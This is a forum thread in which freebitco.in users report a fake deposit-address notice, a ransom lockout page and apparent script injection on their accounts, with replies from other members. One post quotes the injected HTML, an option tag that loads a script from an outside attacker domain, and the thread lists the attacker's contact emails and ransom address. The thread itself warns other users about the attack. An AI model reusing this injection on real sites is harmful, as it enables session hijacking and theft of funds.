Bitcoin Forum
May 01, 2024, 06:24:14 AM *
News: Latest Bitcoin Core release: 27.0 [Torrent]
 
   Home   Help Search Login Register More  
Pages: [1]
  Print  
Author Topic: [WARNING] Attack on freebitco.in account  (Read 225 times)
Zibi321 (OP)
Newbie
*
Offline Offline

Activity: 12
Merit: 0


View Profile
April 11, 2024, 05:45:09 PM
Last edit: April 11, 2024, 08:06:34 PM by Zibi321
 #1

Hi,
I would like to share my recent experience using freebitco.in.
There were some attack attempts on my account.
I have been using fbc for years and I've never had any serious problems with the platform.

So, to the point.
I have faced two issues. First one started about week ago.

1. Fake notification about change of deposit address.
There was a notification placed on the main page and looked exactly like any other notification on fbc.
You know, yellow rectangle in a frame.
Same colors, same fonts i.e:
https://www.talkimg.com/images/2024/04/11/jAOVP.png

There was an information about change in deposit address - something more or less like "Please note that your deposit address have been change to segwit P2SH format. Depositing to your old address will be charged of additional fee."
By clicking on Deposit button there was indeed new bitcoin address starting with digit '3...'
It looked very convincing, but I ignored this notification because I didn't plan to make any deposit soon.

I found at least three other users on this forum who faced the same issue:
Below you can find some other user's screenshot - I have just marked parts of this false notification. It's only partially visible in the background.
https://www.talkimg.com/images/2024/04/11/jAWpq.png

According to messages from these users, they actually deposit some funds to new addressees but they were never credited to their fbc account (they even posted their User IDs, TX hashes etc.).

Like I said before, I did not pay much attention to it because I didn't plan to make deposit, but this notification was somehow added/injected into html website code.
Notification looked very convincing but I just wasn't interested with it.
I simply ignored it and I was using fbc as usual.
Beside this notification everything looked and worked as always.
As usual I was claiming free rolls, WoFs, free spins from emails, playing Hi-Lo etc.

After few days, this notification disappeared and deposit address came back to the previous one - legacy format started with '1...'
My thoughts were that they just performed roll back from this change and that's all.

On 9th April I faced second issue.

2. XSS attack?

During another session in Hi-Lo game suddenly my account has been locked.
Instead of fbc website there was a blank page with a message:
"Your account is locked. Please contact @hallohap_1 on telegram or fellowyun@proton.me email. Failure to comply will result to a lost of funds"

I was quite shocked.
I have only one account, I was never using any VPNs or bots.
As usual I was just using built-in feature "auto-bet" and that's all.

I sent a message to fellowyun@proton.me asking what happened.

After few hits of refresh button in my browser blockpage has changed to:
"Your account is locked. Please contact @hallohap_1 on telegram or bellera12@proton.me email. Failure to comply will result to a lost of funds"
https://www.talkimg.com/images/2024/04/09/VeLqf.png

So, I sent the same  message to new e-mail address.
Than started a typical ransom scheme. At this point I didn't know how attacker achieved it, so for me the threat was real.  
I've got a response:
"Your browser is hacked. Send 0.5 btc to bc1qhrdvuxrealra5xm7qsu9tyh06k3frcrzuvsms7 to unlock it. Why trust me? I cant withdraw your money because it needs otp and email. Ill wait 1hr before I drain it"

I knew that sending 0,5 btc is pointless so I started to investigate this attack.
After some time I got another message from attacker that I'm running out time.
I tried to gain some time for myself by tricking him.
https://www.talkimg.com/images/2024/04/11/jHGF1.png

I wiped my entire browser history, tried on a different browser in private/incognito mode, I changed the device to clean PC with different operating system, I even changed DNS servers - everything was exactly the same - blank page with message about locked account.
And this all happened with 2FA enabled.
Then, I started checking logs. In developer tools built in browser I saw entries about loading of a strange js script under https://cashtravel.info/forum/main.js, I blocked it with a "NoScript!" browser plugin. and after that fbc page was unlocked.
Extremely stressed, no thinking much I went straight to Withdraw button and chose Instant Method.
At that point I didn't know how attacker performed this scam, so I was afraid that he will replace withdrawal address on the fly or hijack OTP - but I had no options.
Fortunately I was able to withdraw all my BTC funds.
Instant method worked out well and after ~30min I had all my funds confirmed and stored on my wallet.

How it happened?
I'm not sure.
I have enabled 2FA, I used clean device and issue was still visible. My fbc account email is used only for fbc purpose, so there was no chance for any phishing attacks.
I also don't believe that attacker actually compromise my entire network or all devices I have. For me its impossible or at least it would cost to much effort.

From my point of view attacker found some vulnerability in fbc or 3rd party service they use and managed to exploit it.
I suppose that attacker somehow inject link to external source with malicious script.
In the source code of this malicious script there were hardcoded user IDs. He managed to hijack sessions from specific users.

Why and how I was attacked?
I believe that attacker was targeting highrollers and taking user IDs from wagering leaderboard.
For few days in a row my user ID was shown in the top10 wagering contest.

It's hard to proof now anything.
At some point script was changed and removed.
Source of one version of this script can be found under https://pastebin.ai/eo0q78pbuj
This particular script was prepared to attack user with ID 31898443 who won daily jackpot on 2024-04-08.

At present there is no any script at https://cashtravel.info/forum/main.js
I believe that attacker delete it to cover his tracks.

On my account I still have injected link to malicious script.
I have blocked it from executing but it's still present in a html code.
https://www.talkimg.com/images/2024/04/09/j2Gi8.png
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.
1714544654
Hero Member
*
Offline Offline

Posts: 1714544654

View Profile Personal Message (Offline)

Ignore
1714544654
Reply with quote  #2

1714544654
Report to moderator
1714544654
Hero Member
*
Offline Offline

Posts: 1714544654

View Profile Personal Message (Offline)

Ignore
1714544654
Reply with quote  #2

1714544654
Report to moderator
khaled0111
Legendary
*
Offline Offline

Activity: 2506
Merit: 2840


Top Crypto Casino


View Profile WWW
April 11, 2024, 10:10:25 PM
 #2

Did you contact freebitco.in.in support team to inform them about this. You should do this ASAP so they can investigate what happened and fix the problem in case there is a vulnerability in their website.
Based on the information you shared it's unlikely that your device or network are compromised since there are other victims and the hacker is targeting high rollers, so all he has is their IDs.

█████████████████████████
████▐██▄█████████████████
████▐██████▄▄▄███████████
████▐████▄█████▄▄████████
████▐█████▀▀▀▀▀███▄██████
████▐███▀████████████████
████▐█████████▄█████▌████
████▐██▌█████▀██████▌████
████▐██████████▀████▌████
█████▀███▄█████▄███▀█████
███████▀█████████▀███████
██████████▀███▀██████████
█████████████████████████
.
BC.GAME
▄▄░░░▄▀▀▄████████
▄▄▄
██████████████
█████░░▄▄▄▄████████
▄▄▄▄▄▄▄▄▄██▄██████▄▄▄▄████
▄███▄█▄▄██████████▄████▄████
███████████████████████████▀███
▀████▄██▄██▄░░░░▄████████████
▀▀▀█████▄▄▄███████████▀██
███████████████████▀██
███████████████████▄██
▄███████████████████▄██
█████████████████████▀██
██████████████████████▄
.
..CASINO....SPORTS....RACING..
█░░░░░░█░░░░░░█
▀███▀░░▀███▀░░▀███▀
▀░▀░░░░▀░▀░░░░▀░▀
░░░░░░░░░░░░
▀██████████
░░░░░███░░░░
░░█░░░███▄█░░░
░░██▌░░███░▀░░██▌
░█░██░░███░░░█░██
░█▀▀▀█▌░███░░█▀▀▀█▌
▄█▄░░░██▄███▄█▄░░▄██▄
▄███▄
░░░░▀██▄▀


▄▄████▄▄
▄███▀▀███▄
██████████
▀███▄░▄██▀
▄▄████▄▄░▀█▀▄██▀▄▄████▄▄
▄███▀▀▀████▄▄██▀▄███▀▀███▄
███████▄▄▀▀████▄▄▀▀███████
▀███▄▄███▀░░░▀▀████▄▄▄███▀
▀▀████▀▀████████▀▀████▀▀
PX-Z
Hero Member
*****
Offline Offline

Activity: 1428
Merit: 836


Top Crypto Casino


View Profile WWW
April 11, 2024, 11:48:02 PM
 #3

It looks like you're not the only one who experienced this since march, some of its users too complained on their ANN thread[1], you can make a post there too linking this thread. But as long as there's no response from TheQuin, this will not be cleared. Maybe this is just a technical issue of not reflecting the new address's balance or what, lastly the site might be hacked that way, i hope it's no though. But for the mean time, what you need to do is to wait and don't try to deposit again on the site.

[1] https://bitcointalk.org/index.php?topic=319540.9100

█████████████████████████
████▐██▄█████████████████
████▐██████▄▄▄███████████
████▐████▄█████▄▄████████
████▐█████▀▀▀▀▀███▄██████
████▐███▀████████████████
████▐█████████▄█████▌████
████▐██▌█████▀██████▌████
████▐██████████▀████▌████
█████▀███▄█████▄███▀█████
███████▀█████████▀███████
██████████▀███▀██████████
█████████████████████████
.
BC.GAME
▄▄░░░▄▀▀▄████████
▄▄▄
██████████████
█████░░▄▄▄▄████████
▄▄▄▄▄▄▄▄▄██▄██████▄▄▄▄████
▄███▄█▄▄██████████▄████▄████
███████████████████████████▀███
▀████▄██▄██▄░░░░▄████████████
▀▀▀█████▄▄▄███████████▀██
███████████████████▀██
███████████████████▄██
▄███████████████████▄██
█████████████████████▀██
██████████████████████▄
.
..CASINO....SPORTS....RACING..
█░░░░░░█░░░░░░█
▀███▀░░▀███▀░░▀███▀
▀░▀░░░░▀░▀░░░░▀░▀
░░░░░░░░░░░░
▀██████████
░░░░░███░░░░
░░█░░░███▄█░░░
░░██▌░░███░▀░░██▌
░█░██░░███░░░█░██
░█▀▀▀█▌░███░░█▀▀▀█▌
▄█▄░░░██▄███▄█▄░░▄██▄
▄███▄
░░░░▀██▄▀


▄▄████▄▄
▄███▀▀███▄
██████████
▀███▄░▄██▀
▄▄████▄▄░▀█▀▄██▀▄▄████▄▄
▄███▀▀▀████▄▄██▀▄███▀▀███▄
███████▄▄▀▀████▄▄▀▀███████
▀███▄▄███▀░░░▀▀████▄▄▄███▀
▀▀████▀▀████████▀▀████▀▀
Zibi321 (OP)
Newbie
*
Offline Offline

Activity: 12
Merit: 0


View Profile
April 12, 2024, 04:59:14 PM
 #4

Did you contact freebitco.in.in support team to inform them about this. You should do this ASAP so they can investigate what happened and fix the problem in case there is a vulnerability in their website.
Based on the information you shared it's unlikely that your device or network are compromised since there are other victims and the hacker is targeting high rollers, so all he has is their IDs.

No, at least not yet.
I think I don't have enough evidence to prove anything.


It looks like you're not the only one who experienced this since march, some of its users too complained on their ANN thread[1], you can make a post there too linking this thread. But as long as there's no response from TheQuin, this will not be cleared. Maybe this is just a technical issue of not reflecting the new address's balance or what, lastly the site might be hacked that way, i hope it's no though. But for the mean time, what you need to do is to wait and don't try to deposit again on the site.

[1] https://bitcointalk.org/index.php?topic=319540.9100

Yeah, since my account could be compromised will definitely not deposit there anything soon.
I have changed my password, but still have some security concerns.
For sure attacker can't withdraw anything because of 2FA.
If he managed to hijack my session he can harm me by using my balance to gamble and loose it on purpose.
I was able to withdraw my all BTC funds, but there is still quite big bag of Fun Tokens left.
For now they are locked, I will try to reach them when FUN savings matured.
holydarkness
Legendary
*
Offline Offline

Activity: 2506
Merit: 1400


Yes, I'm an asshole


View Profile
April 12, 2024, 06:20:02 PM
 #5

I necromanced an old freebitco account just to see if there is any notification of address change [other users on their ANN have also explained that they're still using their legacy address] and I didn't see any. It seems the incident is not isolated, so it's safe to say, like khaled0111, that it's not your device that got hacked... or you somehow been compromised just like other three users.

I'll try to bring this to TheQuin, just in case he missed this situation. Hopefully he can clarify what happens.

▄▄███████▄▄
▄██████████████▄
▄██████████████████▄
▄████▀▀▀▀███▀▀▀▀█████▄
▄█████████████▄█▀████▄
███████████▄███████████
██████████▄█▀███████████
██████████▀████████████
▀█████▄█▀█████████████▀
▀████▄▄▄▄███▄▄▄▄████▀
▀██████████████████▀
▀███████████████▀
▀▀███████▀▀
.
 MΞTAWIN  THE FIRST WEB3 CASINO   
.
.. PLAY NOW ..
NK345
Newbie
*
Offline Offline

Activity: 20
Merit: 0


View Profile
April 19, 2024, 07:18:15 AM
 #6

Hi,

I am one of the users which was SCAMMED by the vulnerability of the FBC site. 
Thank you @Zibi321 for explaining it in detail, and I want to add my two cents.

In fact this is what happened to me:
1) I was in the top10 daily wagerers in 31st March or 1st April.
2) the next day my FBC website showed the message about the changing of address (i didn't take a screenshot, but it was same as the case reported by Zibi321, only different deposit address starting with '3...' )
the message was something in the lines of "Please note that your deposit address have been change to segwit P2SH format. Depositing to your old address will be charged of additional fee"  https://www.talkimg.com/images/2024/04/11/jAWpq.png
I didn't think of it too much, as everything worked normally on the site, I was claiming free rolls, WoFs, free spins from emails, playing Hi-Lo, reward points were updating etc., so I assumed this message is just some maintenance / upgrade being done by FBC.
3) on 04 April, i deposited 0.06768 BTC to the new P2SH address  (https://ibb.co/NNPjD0w)   (TX id: 77d47f1b44cd656776ca0b2be753ebc0234da203e673714d577e382b6a50444a),    but never received this amount in my account at FBC.   Suspiciously enough, the next day the message for change of deposit address to P2SH disappeared from the site. 
4) i wrote several times to the freebitcoin support email, to the FAQ page, as well as to TheQuin, and never received any reply from any of those
5) feeling desperate I joined this forum where i saw also other users faced the same issue and were scammed. I also noticed some abnormal behavior of the site, when I tried to click the generate "new deposit address", nothing happened, you can see it on this video link:  https://www.youtube.com/watch?v=O7gXJTFnqyw
6) It seems that within the js script is an embedded MALICIOUS script which was identified by user ID482015 in this forum topic: https://bitcointalk.org/index.php?topic=320959.msg63923149#msg63923149 .   The malicious scirpt is this:
<option value="<script src=https://cashtravel.info/forum/main.js></script>"><script src="https://cashtravel.info/forum/main.js"></script></option>.   
after I blocked this script with AdBlock, now the generate new deposit address is working normally.
This script however is still not removed from the FBC site:   https://ibb.co/L99f2hL

So as a summary, there is a malicious script targeting the high rollers, several people have been scammed by this vulnerability, there is no response from FBC support or TheQuin, the script is still not removed, so the vulnerability is still there, maybe only felt by the targeted audience (high rollers).   

I hope FBC can return the scammed people's money and fix this vulnerability ASAP.  Also support from the community is needed, make it more transparent, otherwise they won't listen to just a few voices.
GinnyBanzz
Newbie
*
Offline Offline

Activity: 24
Merit: 0


View Profile
April 24, 2024, 01:03:54 PM
 #7

Almost unbelievable freebitcoin staff haven't addressed this. Considering the amount of money they are holding their support is unbelievably shite.
Cacenn@outlook.com
Newbie
*
Offline Offline

Activity: 6
Merit: 0


View Profile
April 29, 2024, 01:16:57 AM
 #8

same problem:

didnt know this post before posting my one:

https://bitcointalk.org/index.php?topic=5494608.0
Pages: [1]
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!